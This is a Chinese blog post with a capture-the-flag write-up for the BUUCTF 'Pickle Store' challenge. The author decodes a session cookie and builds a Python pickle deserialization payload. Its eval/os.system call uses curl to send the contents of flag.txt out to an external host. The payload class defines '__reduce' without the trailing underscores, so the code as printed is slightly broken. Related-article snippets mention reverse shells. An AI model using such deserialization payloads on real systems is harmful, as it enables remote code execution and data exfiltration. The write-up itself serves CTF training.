BUUCTF WEB PICKLE STORE

最新推荐文章于 2023-07-15 23:21:44 发布
最新推荐文章于 2023-07-15 23:21:44 发布
阅读量272 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/127127290
版权

这一题是一个简单的python反序列化,简单的写个脚本就好,没啥好说的
那么就来水一篇buuctf 小号靶机的使用
众所周知,buuctf靶场经历了内网K8S改造,导致以前的小号的内网靶机的方法出了问题,我也疑惑了很久,该怎么去用这台不知道公网ip的靶机
后来我想明白了,给的是apache2的公网ip,那就直接外带啊,果然成功了,哈哈。。
不说废话了,先来看看这题,在买东西的时候抓包看cookie是常规操作:
抓到的包里cookie:

session=gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGViNjJxBXUu

看着像base64,解码一下,发现一个标志:anti_tamper_hmac
无法逆向的hmac,那么结合题目的pickle,八九不离十的猜是反序列化
关于pickle的指令解析可以看这个师傅的
https://blog.csdn.net/weixin_45669205/article/details/116274988
反正构造就完事了

class A(object):
	def __reduce(self):
		return(eval,("__import__('os').system('curl http://6c59e8a3-c4c8-46fc-9875-d658ec5cc0eb.node4.buuoj.cn:81/`cat flag.txt`')",))
a=A()
print(pickle.dumps(a))
print(base64.b64encode(pickle.dumps(a)))

外带成功,撒花!

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
c3d.pickle
05-06
C3D:使用3D卷积网络学习时空特征 行为识别:C3D network-用于视频特征提取的3维卷积网络
buuctf have fun
yedizhende6的博客
11-28 241
buuctf have fun
BUUCTF:[watevrCTF-2019]Pickle Store
末初的CSDN博客
07-26 1117
题目地址:https://buuoj.cn/challenges#[watevrCTF-2019]Pickle%20Store Pickle反序列化 使用pickle.loads()和base64对这串字符进行解码反序列化 利用Pickle反序列化exp反弹shell 在Buu的小号上开一台内网靶机 import base64 import pickle class A(object): def __reduce__(self): return (eval, ("__imp
python反序列化-[watevrCTF-2019]Pickle Store
snowlyzz的博客
09-01 822
详细讲解pickle
最全CTF Web题思路总结(更新ing)
热门推荐
yjprolus的博客
02-12 3万+
个人向CTF Web题思路总结笔记
[watevrCTF-2019]Pickle Store
qq_61209261的博客
08-13 354
pickle反序列化
Python pickle模块用法实例
09-22
主要介绍了Python pickle模块用法实例,python的pickle模块实现了基本的数据序列和反序列化,需要的朋友可以参考下
pickle与struct模块简介
03-22
pickle与struct模块简介
Python pickle模块常用方法代码实例
01-19
pickle: 用于python特有的类型和python的数据类型间进行转换 json提供四个功能:dumps,dump,loads,load pickle提供四个功能:dumps,dump,loads,load pickle可以存储什么类型的数据呢? 所有python支持的原生类型...
Python pickle模块用法实例分析
09-22
主要介绍了Python pickle模块用法,实例分析了pickle模块的功能与相关使用技巧,需要的朋友可以参考下
BUUCTF--[watevrCTF-2019]Pickle Store
qq_46263951的博客
08-08 377
一般看到商店需要购买flag的直接就会想到session和cookie 我们先将session的值来接
BUUCTF靶场练习——第一周
weixin_47063945的博客
07-15 694
整理了buuctf靶场前6道web题目的writeup并整理了涉及到的部分知识的整理和扩展
BUUCTF [极客大挑战 2019] Knife
Senimo
10-18 276
BUUCTF [极客大挑战 2019] Knife 启动靶机,打开环境: 题目提示为菜刀,并且给出了一句话木马 直接使用中国蚁剑连接即可: flag在根目录下:
buu内网靶机部署
pop364的博客
05-12 1395
basic题目下发实例 只需要xshell(不用frp) ssh (端口22) 用户名:root 密码:123456 连接主机node3.buuoj.cn 端口下发的实例端口27058(随机) ifconfig查内网ip174.1.64.147 /var/www/html 默认开了apache
BUUCTF在线评测之Linux Labs 1
weixin_49182737的博客
03-02 1万+
这个测试没什么技术要求,只要了解ssh以及linux系统即可 点击启动靶机,出现的页面 点击所给的http链接,得到如下界面 Index of 这个页面啥也没有,没啥用 返回第一个界面,给出了ssh 以及映射地址和端口(这个地址+端口是随机的) 所以直接启动ssh链接即可 however!!!这里要 banter一下BUUCTF网站的这个Linux Labs 1测试中的这句话 这句话,不仅是说主机可以访问,且只有主机可以访问!!! As we all know,我们最常用的Windows OS没有自带
手把手教你如何建立一个支持ctf动态独立靶机的靶场(ctfd+ctfd-whale)
fjh1997的博客
09-15 2万+
手把手教你如何建立一个支持ctf动态独立靶机的靶场 前言 要说开源的ctf训练平台,ctfd是不错的选择,支持各种插件,今天我就来介绍一下如何部署赵今师傅为ctfd平台写的一款支持独立动态靶机的插件。 动态独立靶机 说到独立动态靶机,各位ctfer可能会联想到i春秋举办的各类比赛,其中比赛环境大都用到了动态独立靶机(dynamic standalone instance)技术,也就是每做一道题,就...
BUUCTF在线测评之[极客大挑战 2019]EasySQL 1
weixin_49182737的博客
03-03 5368
启动靶机 只给了一个地址,点击进去即是靶机 可以看到这是一个登录页面 虽然靶机信息那已经提示我们这是一个EasySql,结合靶机页面是登录页面,把八九不离十的可以确定这一题是考察SQL注入的,并且Easy提示我们,是简单的sql注入。 BUT出于一个网安爱好者的心态,我们还是要简单看一下这个页面的信息,说不定出题者挖坑呢 。。。 虽然结果是然并卵 所以还是老老实实听提示试sql注入吧 这里安利一下firefox,这浏览器可以在拓展里装Hackbar,一款房间寻找web安全bug的插件 一个不太好的信息时
BUUCTF-Web-题目详解(持续更新……)
AkangBoy的博客
12-11 4308
本文介绍BUUCTF平台上,web题目的详解过程,持续更新
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java
weixin_49422491的博客
07-31 1784
[RoarCTF 2019]Easy Java
BUUCTF pickle反序列化漏洞
最新发布
09-07
BUUCTF中,有一个题目叫做"Pickle Store",该题目利用了pickle模块的反序列化功能,并在反序列化的过程中执行了恶意代码。具体的攻击方法是,通过抓包获取到一个包含pickle字符串的session值,然后对这个字符串...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值